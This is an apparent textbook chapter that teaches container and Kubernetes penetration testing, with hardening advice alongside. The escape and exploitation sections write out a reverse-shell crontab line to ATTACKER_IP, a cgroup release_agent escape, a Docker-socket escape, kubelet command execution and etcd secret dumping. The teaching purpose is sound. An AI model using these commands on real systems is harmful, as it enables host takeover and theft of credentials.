In the span of a decade, containers have transformed from a niche Linux technology into the dominant paradigm for deploying applications at scale. Docker democratized containerization starting in 2013, and Kubernetes—open-sourced by Google in...
Learning Objectives
- Understand container security fundamentals and the threat landscape
- Audit Docker images, registries, and runtime configurations for vulnerabilities
- Execute and defend against container escape techniques
- Map the Kubernetes architecture and identify its attack surface
- Exploit Kubernetes RBAC misconfigurations, Secrets exposure, and API server weaknesses
- Assess supply chain risks in containerized infrastructure
- Apply defensive strategies for hardening container and Kubernetes environments
In This Chapter
- Introduction
- 32.1 Container Security Fundamentals
- 32.2 Docker Security
- 32.3 Container Escape Techniques
- 32.4 Kubernetes Architecture and Attack Surface
- 32.5 Kubernetes Exploitation
- 32.6 Supply Chain Attacks on Container Infrastructure
- 32.7 Tools and Techniques for Container Security Assessment
- 32.8 Hardening Containers and Kubernetes
- 32.9 Cloud-Specific Considerations
- 32.10 Service Mesh Security Considerations
- 32.11 Reporting Container and Kubernetes Findings
- 32.12 Container Security in CI/CD Pipelines
- 32.13 Practical Lab Exercises
- 32.11 Summary
- References
Chapter 32: Container and Kubernetes Security
Introduction
In the span of a decade, containers have transformed from a niche Linux technology into the dominant paradigm for deploying applications at scale. Docker democratized containerization starting in 2013, and Kubernetes—open-sourced by Google in 2014—became the de facto orchestration platform. By 2025, over 90% of organizations reported using containers in production, with Kubernetes adoption exceeding 80% among enterprises running containerized workloads.
This massive adoption has created an equally massive attack surface. Container environments introduce novel security challenges that traditional penetration testing methodologies were not designed to address. Misconfigured Docker daemons have exposed entire cloud environments. Vulnerable Kubernetes dashboards have been leveraged for cryptocurrency mining. Supply chain attacks targeting container images have compromised thousands of organizations simultaneously.
💡 Why This Chapter Matters: As a penetration tester, you will increasingly encounter containerized environments. Understanding how to assess, exploit, and recommend hardening for container and Kubernetes infrastructure is no longer optional—it is a core competency. The organizations you test almost certainly run containers, and the vulnerabilities in these systems can be devastating.
For our running examples, consider these scenarios:
- MedSecure has migrated its electronic health records platform to a microservices architecture running on Kubernetes in AWS EKS. Patient data flows through dozens of containerized services, and a compromise of any one could violate HIPAA.
- ShopStack runs its entire e-commerce platform on Docker containers orchestrated by Kubernetes, with a CI/CD pipeline that builds and pushes images automatically. Their supply chain security is only as strong as their weakest image dependency.
- Student Home Lab can replicate these environments affordably using Minikube, kind (Kubernetes in Docker), and deliberately vulnerable container images for practice.
This chapter provides the methodologies, tools, and techniques you need to assess container and Kubernetes security from an ethical hacking perspective—while always operating within the boundaries of your authorized engagement scope.
The chapter is organized to mirror a realistic assessment workflow. We begin with container fundamentals, then examine Docker-specific security, container escape techniques, Kubernetes architecture and exploitation, supply chain attacks, tooling, hardening, and cloud-specific considerations. By the end, you will have a comprehensive methodology for assessing containerized environments.
32.1 Container Security Fundamentals
32.1.1 What Are Containers?
Containers are lightweight, isolated execution environments that package an application with its dependencies. Unlike virtual machines, containers share the host operating system's kernel, relying on Linux kernel features—primarily namespaces and cgroups—for isolation.
Namespaces provide isolation of system resources:
| Namespace | Isolates |
|---|---|
| PID | Process IDs |
| NET | Network interfaces, routing tables |
| MNT | Filesystem mount points |
| UTS | Hostname and domain name |
| IPC | Inter-process communication resources |
| USER | User and group IDs |
| CGROUP | Cgroup root directory |
Cgroups (control groups) limit and account for resource usage: - CPU time and allocation - Memory limits and accounting - Block I/O bandwidth - Network bandwidth (via tc integration)
⚠️ Critical Security Insight: Containers are NOT virtual machines. They share the host kernel. A kernel exploit inside a container can compromise the host. This fundamental architectural reality underpins most container escape techniques.
32.1.2 The Container Threat Model
The container threat model encompasses several attack vectors that penetration testers must evaluate:
Image-Level Threats: - Vulnerable base images with known CVEs - Embedded secrets (API keys, passwords) in image layers - Malicious images from untrusted registries - Outdated dependencies baked into images
Build-Level Threats: - Compromised build pipelines injecting malicious code - Tampered base images in private registries - Build-time secret leakage through layer caching
Runtime Threats: - Container escape to host - Lateral movement between containers - Privilege escalation within containers - Resource abuse (cryptomining)
Orchestration Threats (Kubernetes-specific): - API server misconfiguration - RBAC over-permissioning - Secrets stored in plaintext - Network policy absence enabling lateral movement - Service account token abuse
Supply Chain Threats: - Compromised upstream images - Dependency confusion in package managers - Typosquatting in container registries
32.1.3 The Shared Kernel Problem
The most critical security implication of containers is the shared kernel. Every container on a host communicates with the same Linux kernel through system calls. This creates several important consequences:
Kernel Vulnerability Exposure: A vulnerability in the Linux kernel is exploitable from within any container on that host. Unlike virtual machines, where a hypervisor mediates hardware access and each guest has its own kernel, containers have direct (filtered) access to kernel system calls. When a new kernel CVE is announced, every container on every unpatched host is potentially vulnerable.
System Call Surface: Containers make system calls directly to the host kernel. While seccomp profiles can restrict which system calls are allowed, the default Docker seccomp profile still permits over 300 of the approximately 440 available system calls. Each permitted system call is a potential attack vector.
Resource Visibility: Without proper namespace configuration, containers may have visibility into host resources. For example, without PID namespace isolation, a container can see host processes. Without proper cgroup isolation, a container might influence host resource allocation.
Namespace Escape Vectors: Each namespace type provides a specific isolation boundary. Weaknesses in namespace implementation or configuration can provide escape vectors. The user namespace, for instance, has had multiple vulnerabilities that allowed privilege escalation.
Consider MedSecure's deployment: their patient-facing web application and their internal billing system both run as containers on the same Kubernetes node. If an attacker compromises the web application container and exploits a kernel vulnerability, they gain access to the host and, by extension, the billing container with its financial data. This is fundamentally different from a traditional deployment where the web server and billing system might run on separate physical servers.
📊 Container Escape CVE History: Between 2019 and 2025, over 30 container escape CVEs were published, affecting runc, containerd, Docker, and related components. Notable examples include CVE-2019-5736 (runc overwrite), CVE-2020-15257 (containerd shim), CVE-2022-0185 (filesystem context overflow), and CVE-2024-21626 (runc working directory). Keeping track of these CVEs is essential for effective container security assessment.
32.1.4 Container Security vs. Traditional Security
Penetration testers accustomed to traditional infrastructure assessments must adapt their methodology for containerized environments:
| Traditional | Container |
|---|---|
| Persistent servers | Ephemeral containers |
| Manual patching | Immutable images rebuilt from base |
| Host-level firewall rules | Network policies and service mesh |
| SSH access for administration | kubectl exec, container runtime APIs |
| Static IP addresses | Dynamic service discovery |
| Monolithic applications | Microservices with inter-service communication |
| Centralized logging | Distributed logging across pods |
🔵 Blue Team Perspective: Defenders should recognize that container security requires a shift-left approach. Security must be integrated into the CI/CD pipeline—scanning images before deployment, enforcing admission policies, and continuously monitoring runtime behavior. Waiting to secure containers in production is too late.
32.2 Docker Security
32.2.1 Docker Architecture and Attack Surface
Docker uses a client-server architecture. The Docker daemon (dockerd) runs as root on the host and manages containers, images, networks, and volumes. The Docker client communicates with the daemon via a Unix socket (/var/run/docker.sock) or over TCP. Understanding this architecture is essential because the daemon's root-level access means that anyone who can communicate with the daemon effectively has root access to the host.
The Docker daemon handles all container lifecycle operations: pulling images from registries, creating containers from images, starting and stopping containers, managing networking between containers, and handling storage volumes. It also exposes a RESTful API that can be accessed directly via HTTP, which is the same API the Docker CLI uses. This API is the primary target for many Docker-specific attacks.
When Docker is used as the container runtime in Kubernetes, the relationship becomes more complex. The kubelet on each node communicates with the Docker daemon (or containerd/CRI-O) to manage containers. Kubernetes adds its own layer of orchestration, including the API server, scheduler, and controller manager, each adding to the overall attack surface.
The attack surface includes:
- Docker Daemon Socket — If accessible, provides full control over all containers and the host
- Docker API — When exposed over TCP without TLS, enables remote exploitation
- Docker Images — May contain vulnerabilities, malware, or secrets
- Docker Registries — Can be compromised to serve malicious images
- Container Runtime — Responsible for actual container execution; vulnerabilities here enable escapes
- Docker Compose / Swarm — Orchestration adds additional configuration complexity
32.2.2 Auditing Docker Images
Image security assessment is the first line of defense. As a penetration tester, you should evaluate images for:
Scanning for Known Vulnerabilities:
# Using Trivy to scan an image
trivy image nginx:latest
# Scan with severity filter
trivy image --severity HIGH,CRITICAL medsecure/patient-api:v2.1
# Scan a local Dockerfile
trivy config Dockerfile
# Using Grype for vulnerability scanning
grype medsecure/patient-api:v2.1
Inspecting Image Layers for Secrets:
# Pull and save the image
docker save medsecure/patient-api:v2.1 -o patient-api.tar
# Extract and examine layers
mkdir image-layers && cd image-layers
tar xf ../patient-api.tar
# Search for secrets in all layers
for layer in */layer.tar; do
echo "=== Examining $layer ==="
tar tf "$layer" | grep -iE '(\.env|\.pem|\.key|password|secret|credential|token)'
done
# Use dive to interactively explore image layers
dive medsecure/patient-api:v2.1
⚠️ Common Finding: Developers frequently add secrets to an image in one layer and remove them in a subsequent layer, believing this hides them. Because Docker images are composed of additive layers, the secret remains accessible in the earlier layer. Always inspect ALL layers, not just the final filesystem.
Dockerfile Best Practices Audit:
When reviewing Dockerfiles, check for these security issues:
# BAD: Running as root (default if not specified)
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
# BETTER: Non-root user, minimal base, no cache
FROM python:3.11-slim
RUN groupadd -r appuser && useradd -r -g appuser appuser
COPY --chown=appuser:appuser app.py /app/
USER appuser
CMD ["python3", "/app/app.py"]
Key Dockerfile security checks:
- Is a non-root USER specified?
- Is the base image pinned to a digest (not just a tag)?
- Are multi-stage builds used to minimize final image size?
- Are secrets passed via build args (which persist in image history)?
- Are unnecessary packages installed?
- Is --no-cache-dir used for pip installs?
- Are any debugging tools included (strace, tcpdump, netcat) that aid post-exploitation?
- Is the COPY command scoped narrowly, or does it copy the entire build context?
- Is a .dockerignore file used to prevent sensitive files from being included?
- Are HEALTHCHECK instructions defined for orchestration integration?
Example: ShopStack Dockerfile Audit Finding
During ShopStack's penetration test, the team discovered the following in a production Dockerfile:
FROM node:18
WORKDIR /app
COPY . .
RUN npm install
ENV STRIPE_SECRET_KEY=sk_live_51Abc...
ENV DATABASE_URL=postgresql://admin:P@ssw0rd@db.internal:5432/shopstack
EXPOSE 3000
CMD ["node", "server.js"]
This Dockerfile contained six critical issues:
- Running as root (no USER directive)
- Unpinned base image tag (
:18could change) - Copying entire build context (likely including
.git,.env) - Production secrets hardcoded as ENV variables
- No
.dockerignoreto exclude sensitive files - No multi-stage build to minimize image size and attack surface
The hardcoded Stripe secret key was recoverable from any of the image's layers, even after the team attempted to "fix" it by removing the ENV line in a later Dockerfile revision. This finding was rated Critical because it exposed payment processing credentials to anyone with access to the container registry.
32.2.3 Docker Registry Security
Private registries store an organization's container images and represent a high-value target:
# Check if a registry allows anonymous access
curl -s https://registry.medsecure.local/v2/_catalog
# List tags for a repository
curl -s https://registry.medsecure.local/v2/patient-api/tags/list
# Pull manifest to examine image configuration
curl -s https://registry.medsecure.local/v2/patient-api/manifests/latest \
-H "Accept: application/vnd.docker.distribution.manifest.v2+json"
# Download and inspect individual layers
curl -s https://registry.medsecure.local/v2/patient-api/blobs/sha256:<digest> \
-o layer.tar.gz
Common Registry Misconfigurations: - Anonymous read access enabled - Anonymous push access (allowing image replacement) - No content trust / image signing enforcement - Registry exposed to the internet without authentication - Use of HTTP instead of HTTPS - Missing vulnerability scanning integration
📊 Assessment Checklist — Docker Registry: - [ ] Authentication required for pull operations - [ ] Authentication required for push operations - [ ] TLS enabled and properly configured - [ ] Content trust / Notary signing enforced - [ ] Vulnerability scanning integrated into push pipeline - [ ] Access logging enabled - [ ] Network access restricted to authorized clients
32.2.4 Docker Runtime Security
Runtime security assessment focuses on how containers are configured and executed:
Checking Docker Daemon Configuration:
# Inspect daemon configuration
docker info
docker system info --format '{{json .SecurityOptions}}'
# Check if Docker socket is mounted in any container
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} {{range .Mounts}}{{.Source}} {{end}}' \
| grep docker.sock
# Check for privileged containers
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} Privileged:{{.HostConfig.Privileged}}'
# Check for containers with dangerous capabilities
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} CapAdd:{{.HostConfig.CapAdd}}'
Docker Bench Security:
Docker Bench for Security is an automated script that checks dozens of common Docker security misconfigurations:
# Run Docker Bench Security
docker run --rm --net host --pid host --userns host --cap-add audit_control \
-e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
-v /var/lib:/var/lib:ro \
-v /var/run/docker.sock:/var/run/docker.sock:ro \
-v /usr/lib/systemd:/usr/lib/systemd:ro \
-v /etc:/etc:ro \
docker/docker-bench-security
Dangerous Docker Run Flags:
As a penetration tester, these flags indicate potential exploitation paths:
| Flag | Risk | Impact |
|---|---|---|
--privileged |
Container has full host capabilities | Direct host escape |
-v /:/host |
Host root filesystem mounted | Full host access |
--pid=host |
Shares host PID namespace | Can see/signal host processes |
--net=host |
Shares host network namespace | No network isolation |
--cap-add SYS_ADMIN |
Adds administrative capabilities | Many escape techniques |
-v /var/run/docker.sock:/var/run/docker.sock |
Docker socket access | Can control Docker daemon |
32.3 Container Escape Techniques
Container escapes represent some of the most impactful findings in a penetration test. When a tester can break out of a container and access the underlying host, the entire container infrastructure is at risk. A successful container escape typically means the attacker gains root access on the host, which in a Kubernetes environment translates to access to every container on that node, the kubelet credentials, and potentially the entire cluster.
The severity of a container escape depends on the environment. In a dedicated host with a single application, the impact is limited to that host. In a multi-tenant Kubernetes cluster—like those used by cloud providers for managed container services—an escape could compromise all tenants sharing the same node. The Azurescape vulnerability discussed in Case Study 2 demonstrated this catastrophic scenario in a real cloud environment.
⚖️ Legal and Ethical Reminder: Container escape testing should only be performed within your authorized scope. Escaping a container in a shared cloud environment could inadvertently affect other tenants. Always confirm with your client that escape testing is in scope, and use isolated test environments when possible.
32.3.1 Escaping Privileged Containers
Privileged containers (--privileged) disable almost all containment. They can access host devices, bypass AppArmor/SELinux, and mount host filesystems:
# Inside a privileged container — mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Access host files
cat /mnt/host/etc/shadow
# Write a cron job for reverse shell on host
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' \
>> /mnt/host/etc/crontab
# Alternative: use nsenter to enter host namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
32.3.2 Docker Socket Escape
When the Docker socket is mounted inside a container, the container can communicate directly with the Docker daemon and create new containers with arbitrary configurations:
# Verify Docker socket is available
ls -la /var/run/docker.sock
# Install Docker CLI inside the container (or use curl)
# Using curl to interact with Docker API:
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | python3 -m json.tool
# Create a new privileged container mounting the host root
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine",
"Cmd": ["/bin/sh"],
"Tty": true,
"HostConfig": {
"Binds": ["/:/host"],
"Privileged": true
}
}'
# Start the container and exec into it
# Then access /host for full host filesystem access
💡 Testing Tip: In MedSecure's environment, the development team mounted the Docker socket into a monitoring container for convenience. This single misconfiguration provided a path from an initial web application compromise to full host access, bypassing all container isolation.
32.3.3 Kernel Exploitation
Since containers share the host kernel, kernel vulnerabilities can be exploited from within a container:
CVE-2022-0185 — Filesystem Context Heap Overflow:
This vulnerability in the Linux kernel's filesystem context handling allowed an attacker with CAP_SYS_ADMIN (available in some container configurations) to escape to the host.
CVE-2022-0847 (Dirty Pipe): A kernel vulnerability allowing arbitrary write to read-only files, exploitable from within containers to overwrite host files.
# Check kernel version from inside container
uname -r
# Compare against known vulnerable versions
# Research: https://www.cvedetails.com/ for kernel CVEs
32.3.4 cgroup Escape (CVE-2022-0492)
The release_agent cgroup escape leverages a misconfiguration where a container can write to the host's cgroup release_agent file:
# Check if cgroup v1 is in use and writable
mount | grep cgroup
# Create a cgroup and set release_agent
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/escape
# Set up the escape
echo 1 > /tmp/cgrp/escape/notify_on_release
# Get container's path on host filesystem
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write command to execute on host
echo '#!/bin/sh' > /cmd
echo "cat /etc/hostname > $host_path/output" >> /cmd
chmod a+x /cmd
# Trigger the escape
sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"
# Read the output
cat /output
32.3.5 Detecting Container Escape Opportunities
During a penetration test, systematically check for escape vectors:
# Am I in a container?
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "Docker container"
[ -f /.dockerenv ] && echo "Docker container"
cat /proc/1/cgroup 2>/dev/null | grep -qi kubepods && echo "Kubernetes pod"
# Check for privileged mode
ip link add dummy0 type dummy 2>/dev/null && echo "Likely privileged" && ip link delete dummy0
# Check for Docker socket
ls -la /var/run/docker.sock 2>/dev/null
# Check capabilities
cat /proc/self/status | grep CapEff
# Decode with: capsh --decode=<hex_value>
# Check for sensitive mounts
mount | grep -E '(docker|kube|/etc|/var)'
# Check for service account tokens (Kubernetes)
ls -la /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null
# Check AppArmor/SELinux status
cat /proc/self/attr/current 2>/dev/null
🔵 Blue Team Perspective: Defend against container escapes by: (1) never running privileged containers in production, (2) using read-only root filesystems, (3) dropping all unnecessary capabilities, (4) enabling seccomp profiles, (5) enforcing AppArmor or SELinux policies, (6) keeping the host kernel patched, and (7) using gVisor or Kata Containers for additional isolation layers.
32.3.6 Practical Container Escape Methodology
When conducting a container security assessment, follow this systematic approach to evaluate escape potential:
Step 1: Environment Identification Determine the container runtime, kernel version, and isolation mechanisms in use. This context determines which escape techniques are applicable.
Step 2: Privilege Assessment Check for privileged mode, dangerous capabilities, and namespace sharing. These are the most common and easiest escape vectors.
Step 3: Mount Analysis Enumerate all mounted volumes, looking for Docker sockets, host paths, and sensitive filesystems. Mounted sockets provide the most reliable escape path.
Step 4: Kernel CVE Cross-Reference Compare the host kernel version against known CVEs. If the kernel is outdated, kernel-level escapes may be possible even without misconfigurations.
Step 5: Network Assessment From within the container, probe for access to the host network, cloud metadata services, and other containers. Even without a full escape, network access to sensitive services may be sufficient to achieve assessment objectives.
Step 6: Documentation Document every finding with exact commands, outputs, and potential impact. For each escape vector identified, note whether it was actually exploitable or merely theoretically possible given the configuration.
💡 Assessment Tip: Not every container assessment requires an actual escape. Identifying the misconfiguration (e.g., privileged mode, mounted socket) and documenting the potential impact is often sufficient for a penetration test report. Actually performing the escape is important for proof-of-concept but should be done carefully to avoid disrupting production systems. Always discuss with the client before attempting escape techniques that could affect host stability.
32.4 Kubernetes Architecture and Attack Surface
32.4.1 Kubernetes Components
Understanding Kubernetes architecture is essential for effective security assessment. Kubernetes follows a master-worker architecture:
Control Plane Components:
- kube-apiserver — The central management point. All operations go through the API server. Compromise of the API server means full cluster control.
- etcd — Distributed key-value store holding all cluster state, including Secrets. Directly accessing etcd bypasses all RBAC controls.
- kube-scheduler — Assigns pods to nodes. Manipulation could force workloads onto compromised nodes.
- kube-controller-manager — Runs controllers that regulate cluster state. Compromise enables persistent cluster manipulation.
- cloud-controller-manager — Interfaces with cloud provider APIs. Compromise may enable cloud account pivoting.
Worker Node Components:
- kubelet — Agent running on each node that manages pods. The kubelet API (port 10250) is a frequent attack target.
- kube-proxy — Manages network rules for service routing.
- Container Runtime — Docker, containerd, or CRI-O actually runs the containers.
Additional Components:
- CoreDNS — Cluster DNS for service discovery
- Ingress Controllers — Handle external HTTP/HTTPS traffic routing
- Service Mesh (Istio, Linkerd) — Manages inter-service communication
- Dashboard — Web UI for cluster management (frequently misconfigured)
32.4.2 Kubernetes Attack Surface Map
EXTERNAL
|
[Ingress Controller] --- Web-facing vulns
|
[API Server] --- AuthN/AuthZ bypass
/ | \
[etcd] [Scheduler] [Controller Manager]
| | |
Raw secrets Pod placement Cluster state
[Node 1] [Node 2] [Node 3]
/ | \ / | \ / | \
[kubelet][proxy][pods] [kubelet][proxy][pods] [kubelet]...
| |
Port 10250 Port 10250
(API target) (API target)
32.4.3 Common Kubernetes Attack Paths
Based on real-world penetration tests and incidents, these are the most frequently exploited attack paths:
Path 1: Exposed Dashboard / API Server
Internet → Exposed K8s Dashboard (no auth) → Create privileged pod → Container escape → Node compromise → Cluster takeover
Path 2: Compromised Pod to Cluster
Web app exploit → Pod shell → Service account token → API server enumeration → RBAC escalation → Secrets extraction → Lateral movement
Path 3: Supply Chain
Compromised CI/CD → Malicious image push → Deployment picks up new image → Code execution in cluster → Pivot to internal services
Path 4: Kubelet API
Network access to node → Unauthenticated kubelet API → List pods → Exec into any pod → Extract secrets → Pivot
📊 Attack Path Probability (from aggregated pen test data): - Misconfigured RBAC: ~45% of engagements - Secrets in plaintext: ~60% of engagements - Missing network policies: ~70% of engagements - Exposed kubelet API: ~15% of engagements - Container escape possible: ~10% of engagements
32.5 Kubernetes Exploitation
Kubernetes exploitation represents a distinct skill set within container security assessment. While Docker security focuses on individual container isolation, Kubernetes exploitation involves understanding a distributed system's authorization model, service discovery mechanisms, and the trust relationships between components. Mastering Kubernetes exploitation requires thinking in terms of service accounts, RBAC policies, and cluster-wide resources rather than individual user accounts and file permissions.
The exploitation techniques in this section follow a logical progression: gaining initial access to a pod, enumerating the Kubernetes environment, escalating privileges through RBAC misconfigurations, extracting secrets, accessing the API server, moving laterally between services, and exploiting the kubelet API for node-level access.
32.5.1 Enumerating Kubernetes from Inside a Pod
When you gain access to a pod (through a web application vulnerability, for example), your first step is to understand the Kubernetes environment:
# Confirm we're in Kubernetes
env | grep KUBERNETES
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Read the service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# Query the API server
APISERVER=https://kubernetes.default.svc
# Check our permissions
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{
"apiVersion": "authorization.k8s.io/v1",
"kind": "SelfSubjectAccessReview",
"spec": {
"resourceAttributes": {
"verb": "list",
"resource": "secrets",
"namespace": "'"$NAMESPACE"'"
}
}
}'
# List pods in our namespace
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$NAMESPACE/pods
# Attempt to list all namespaces
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces
# Attempt to list secrets
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$NAMESPACE/secrets
32.5.2 RBAC Exploitation
Kubernetes Role-Based Access Control (RBAC) defines what actions principals can perform. Misconfigurations are extremely common:
Understanding RBAC Components: - ServiceAccount — Identity for pods - Role / ClusterRole — Defines permissions (verbs on resources) - RoleBinding / ClusterRoleBinding — Associates roles with subjects
Common RBAC Misconfigurations:
# DANGEROUS: Wildcard permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: too-permissive
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
# DANGEROUS: Service account bound to cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: dev-admin-binding
subjects:
- kind: ServiceAccount
name: default
namespace: development
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
RBAC Enumeration with kubectl (if available):
# Check what we can do
kubectl auth can-i --list
# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create pods --subresource=exec
# Enumerate roles and bindings
kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A
# Look for overprivileged service accounts
kubectl get clusterrolebindings -o json | \
jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'
RBAC Escalation Techniques:
If your service account can create pods, you can escalate by creating a pod with a more privileged service account:
# Create a pod using a privileged service account
apiVersion: v1
kind: Pod
metadata:
name: escalation-pod
namespace: kube-system
spec:
serviceAccountName: clusterrole-aggregation-controller
automountServiceAccountToken: true
containers:
- name: pwned
image: alpine
command: ["/bin/sh", "-c", "sleep 3600"]
32.5.3 Secrets Exploitation
Kubernetes Secrets are base64-encoded (NOT encrypted) by default. This is one of the most commonly misunderstood aspects of Kubernetes security:
# List secrets in a namespace
kubectl get secrets -n medsecure-production
# Read a secret (output is base64-encoded)
kubectl get secret database-credentials -n medsecure-production -o json
# Decode the secret
kubectl get secret database-credentials -n medsecure-production \
-o jsonpath='{.data.password}' | base64 -d
# Find all secrets across the cluster (if permitted)
kubectl get secrets -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, keys: (.data | keys)}'
# Check environment variables in running pods for injected secrets
kubectl get pods -n medsecure-production -o json | \
jq '.items[].spec.containers[].env[]? | select(.valueFrom.secretKeyRef)'
⚠️ Critical Finding Pattern: In MedSecure's assessment, the
defaultservice account in theproductionnamespace had permissions to read all secrets. Since every pod uses thedefaultservice account unless otherwise specified, any compromised pod could read database credentials, API keys, and TLS certificates.
Accessing etcd Directly:
If you can reach etcd (default port 2379), you can bypass all RBAC and read every secret:
# Check if etcd is accessible
curl -s https://ETCD_IP:2379/version --cacert ca.crt --cert client.crt --key client.key
# Read all secrets from etcd
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
--cacert=ca.crt --cert=client.crt --key=client.key \
get /registry/secrets --prefix --keys-only
# Read a specific secret
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
--cacert=ca.crt --cert=client.crt --key=client.key \
get /registry/secrets/medsecure-production/database-credentials
32.5.4 API Server Exploitation
The Kubernetes API server is the crown jewel. Misconfigurations can expose it to unauthenticated access:
# Check for unauthenticated access
curl -sk https://K8S_API:6443/api/v1/namespaces
# Check for anonymous authentication
curl -sk https://K8S_API:6443/api/v1/pods
# Check common insecure API server flags:
# --anonymous-auth=true (default, often combined with permissive RBAC)
# --insecure-port=8080 (deprecated but sometimes still used)
# --authorization-mode=AlwaysAllow (devastating if present)
# Token brute-force is not practical, but token leakage is common
# Check CI/CD logs, environment variables, and config maps for tokens
Kubernetes Dashboard Exploitation:
The Kubernetes Dashboard, when exposed without authentication, provides a web UI for full cluster management:
# Common dashboard URLs
# https://K8S_IP:30000
# https://K8S_IP/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
# Check if dashboard is exposed
nmap -sS -p 30000,8443,443 K8S_IP
# If accessible, the dashboard may allow:
# - Viewing all resources across namespaces
# - Creating new deployments
# - Executing commands in pods
# - Reading secrets
🔴 Real-World Attack: The Tesla Kubernetes incident (detailed in Case Study 1) began with an exposed, unauthenticated Kubernetes dashboard. Attackers used it to deploy cryptocurrency miners and discovered AWS credentials in the environment, demonstrating the cascading impact of a single misconfiguration.
32.5.5 Lateral Movement in Kubernetes
Once inside a Kubernetes cluster, lateral movement follows several patterns:
# Service discovery via DNS
nslookup kubernetes.default.svc.cluster.local
nslookup *.medsecure-production.svc.cluster.local
# Scan internal service network
# Kubernetes services typically use 10.96.0.0/12
# Pods typically use 10.244.0.0/16 (depends on CNI)
for ip in $(seq 1 254); do
timeout 1 bash -c "echo >/dev/tcp/10.96.0.$ip/80" 2>/dev/null && \
echo "10.96.0.$ip:80 open"
done
# Access other services via Kubernetes DNS
curl http://patient-database.medsecure-production.svc.cluster.local:3306
curl http://redis-cache.medsecure-production.svc.cluster.local:6379
# Check for network policies (if kubectl available)
kubectl get networkpolicies -A
# Empty output = no network segmentation between pods
💡 Penetration Testing Technique: In environments without network policies (the majority of Kubernetes clusters), any pod can communicate with any other pod. After compromising a low-value frontend pod, scan the internal network to discover databases, caches, and internal APIs that are not exposed externally.
MedSecure Lateral Movement Example:
During MedSecure's assessment, the team compromised a patient-facing appointment scheduling pod. From this pod, they discovered:
- No network policies existed in any namespace
- The pod could reach the
patient-recordsservice on port 5432 (PostgreSQL) - The database credentials were stored as Kubernetes Secrets that the pod's service account could read
- Using the credentials, the team connected to the database and demonstrated read access to 50,000 patient records
The attack chain—web application exploit to pod shell to service account token to secret extraction to database access—never required a container escape. The lack of network policies and overpermissioned RBAC were sufficient for a complete compromise of patient data. This finding resulted in HIPAA notification requirements and a comprehensive remediation program.
Kubernetes DNS for Service Discovery:
Kubernetes provides built-in DNS that resolves service names to cluster IPs. This is extremely useful for lateral movement:
# Standard Kubernetes DNS format
# <service>.<namespace>.svc.cluster.local
# Discover services by querying DNS
nslookup -type=srv _http._tcp.medsecure-production.svc.cluster.local
# Or use dig for more detailed information
dig +short SRV _http._tcp.medsecure-production.svc.cluster.local
# Enumerate all services in a namespace by trying common names
for svc in api database redis postgres mysql mongodb elasticsearch \
rabbitmq kafka prometheus grafana jenkins; do
nslookup $svc.medsecure-production.svc.cluster.local 2>/dev/null | \
grep -q "Address" && echo "Found: $svc"
done
32.5.6 Kubelet API Exploitation
The kubelet runs on every node and exposes an API on port 10250 (authenticated) and optionally 10255 (read-only, deprecated):
# Check for unauthenticated kubelet access
curl -sk https://NODE_IP:10250/pods
# If accessible, list running pods
curl -sk https://NODE_IP:10250/pods | jq '.items[].metadata.name'
# Execute commands in any pod on this node
curl -sk https://NODE_IP:10250/run/<namespace>/<pod>/<container> \
-d "cmd=id"
# This bypasses all Kubernetes RBAC — the kubelet doesn't enforce it
32.6 Supply Chain Attacks on Container Infrastructure
Supply chain attacks on container infrastructure have emerged as one of the most devastating attack vectors in modern cybersecurity. Unlike traditional attacks that target a single organization, supply chain attacks compromise a shared component—a base image, a CI/CD tool, a package dependency—and impact every organization that uses it. The container ecosystem is particularly vulnerable because containerized applications depend on layers of external components: base operating system images, language runtime images, package manager dependencies, and CI/CD tooling. Each dependency is a potential supply chain attack vector.
The scale of the risk is staggering. A single popular Docker Hub image may be pulled millions of times per month. If that image is compromised—even briefly—the blast radius encompasses every system that pulls and deploys it during the compromise window.
32.6.1 The Container Supply Chain
The container supply chain spans from source code to running production workloads:
